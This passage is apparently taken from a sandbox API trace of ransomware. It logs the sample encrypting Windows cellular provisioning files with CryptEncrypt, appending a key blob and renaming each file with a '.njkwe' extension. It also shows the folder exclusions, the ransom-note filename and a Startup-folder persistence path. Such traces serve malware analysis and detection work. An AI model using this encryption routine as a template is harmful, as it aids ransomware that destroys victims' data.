"c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\330__connections_cellular_sun cellular (philippines)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.361] GetTickCount () returned 0x1153ebb [0078.361] GetTickCount () returned 0x1153ebb [0078.361] GetTickCount () returned 0x1153ebb [0078.361] GetTickCount () returned 0x1153ebb [0078.361] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.361] GetProcessHeap () returned 0xbe0000 [0078.361] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.361] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0078.363] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.363] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0078.363] GetProcessHeap () returned 0xbe0000 [0078.363] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.363] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.363] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.363] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.363] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.364] CloseHandle (hObject=0x43c) returned 1 [0078.364] GetProcessHeap () returned 0xbe0000 [0078.364] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.364] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0078.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\330__connections_cellular_sun cellular (philippines)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\330__Connections_Cellular_Sun Cellular (Philippines)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\330__connections_cellular_sun cellular (philippines)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.364] GetProcessHeap () returned 0xbe0000 [0078.364] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c44137, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c44137, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c44137, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="331__C~1.PRO")) returned 1 [0078.365] lstrcmpiW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.365] lstrcmpiW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.365] lstrcmpiW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.365] lstrcmpiW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.365] lstrcmpiW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.365] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml") returned 159 [0078.365] StrStrIW (lpFirst="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.365] lstrcmpW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.365] lstrcmpW (lpString1="331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.365] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\331__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.365] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\331__connections_cellular_orange (poland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.365] GetTickCount () returned 0x1153ebb [0078.365] GetTickCount () returned 0x1153ebb [0078.365] GetTickCount () returned 0x1153ebb [0078.365] GetTickCount () returned 0x1153ebb [0078.365] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.365] GetProcessHeap () returned 0xbe0000 [0078.366] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.366] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34d, lpOverlapped=0x0) returned 1 [0078.392] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.392] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x34d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34d, lpOverlapped=0x0) returned 1 [0078.392] GetProcessHeap () returned 0xbe0000 [0078.393] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.393] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.393] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.393] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.393] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.393] CloseHandle (hObject=0x43c) returned 1 [0078.393] GetProcessHeap () returned 0xbe0000 [0078.393] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.393] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0078.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\331__connections_cellular_orange (poland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\331__Connections_Cellular_Orange (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\331__connections_cellular_orange (poland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.394] GetProcessHeap () returned 0xbe0000 [0078.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.394] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c44137, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c44137, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c6a39e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="332__C~1.PRO")) returned 1 [0078.396] lstrcmpiW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.396] lstrcmpiW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.396] lstrcmpiW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.396] lstrcmpiW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.396] lstrcmpiW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.396] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml") returned 157 [0078.396] StrStrIW (lpFirst="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.396] lstrcmpW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.396] lstrcmpW (lpString1="332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.396] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\332__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\332__connections_cellular_play (poland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.397] GetTickCount () returned 0x1153eda [0078.397] GetTickCount () returned 0x1153eda [0078.397] GetTickCount () returned 0x1153eda [0078.397] GetTickCount () returned 0x1153eda [0078.397] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.397] GetProcessHeap () returned 0xbe0000 [0078.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.397] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x349, lpOverlapped=0x0) returned 1 [0078.398] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.398] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x349, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x349, lpOverlapped=0x0) returned 1 [0078.398] GetProcessHeap () returned 0xbe0000 [0078.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.398] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.399] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.399] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.399] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.399] CloseHandle (hObject=0x43c) returned 1 [0078.399] GetProcessHeap () returned 0xbe0000 [0078.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.399] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0078.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\332__connections_cellular_play (poland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\332__Connections_Cellular_PLAY (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\332__connections_cellular_play (poland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.400] GetProcessHeap () returned 0xbe0000 [0078.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.400] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c6a39e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c6a39e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c6a39e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="333__C~1.PRO")) returned 1 [0078.400] lstrcmpiW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.400] lstrcmpiW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.400] lstrcmpiW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.400] lstrcmpiW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.400] lstrcmpiW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.400] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml") returned 160 [0078.400] StrStrIW (lpFirst="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.400] lstrcmpW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.400] lstrcmpW (lpString1="333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.400] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\333__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.400] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\333__connections_cellular_pl-plus (poland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.400] GetTickCount () returned 0x1153eda [0078.400] GetTickCount () returned 0x1153eda [0078.400] GetTickCount () returned 0x1153eda [0078.400] GetTickCount () returned 0x1153eda [0078.401] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.401] GetProcessHeap () returned 0xbe0000 [0078.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.401] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34c, lpOverlapped=0x0) returned 1 [0078.402] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.402] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34c, lpOverlapped=0x0) returned 1 [0078.402] GetProcessHeap () returned 0xbe0000 [0078.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.402] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.402] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.402] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.403] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.403] CloseHandle (hObject=0x43c) returned 1 [0078.403] GetProcessHeap () returned 0xbe0000 [0078.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.403] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\333__connections_cellular_pl-plus (poland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\333__Connections_Cellular_PL-PLUS (Poland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\333__connections_cellular_pl-plus (poland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.404] GetProcessHeap () returned 0xbe0000 [0078.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.404] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c6a39e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c6a39e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c6a39e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="334__C~1.PRO")) returned 1 [0078.404] lstrcmpiW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.404] lstrcmpiW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.404] lstrcmpiW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.404] lstrcmpiW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.404] lstrcmpiW (lpString1="334__Connections_Cellular_T-Mobile Poland (Poland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.404] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: 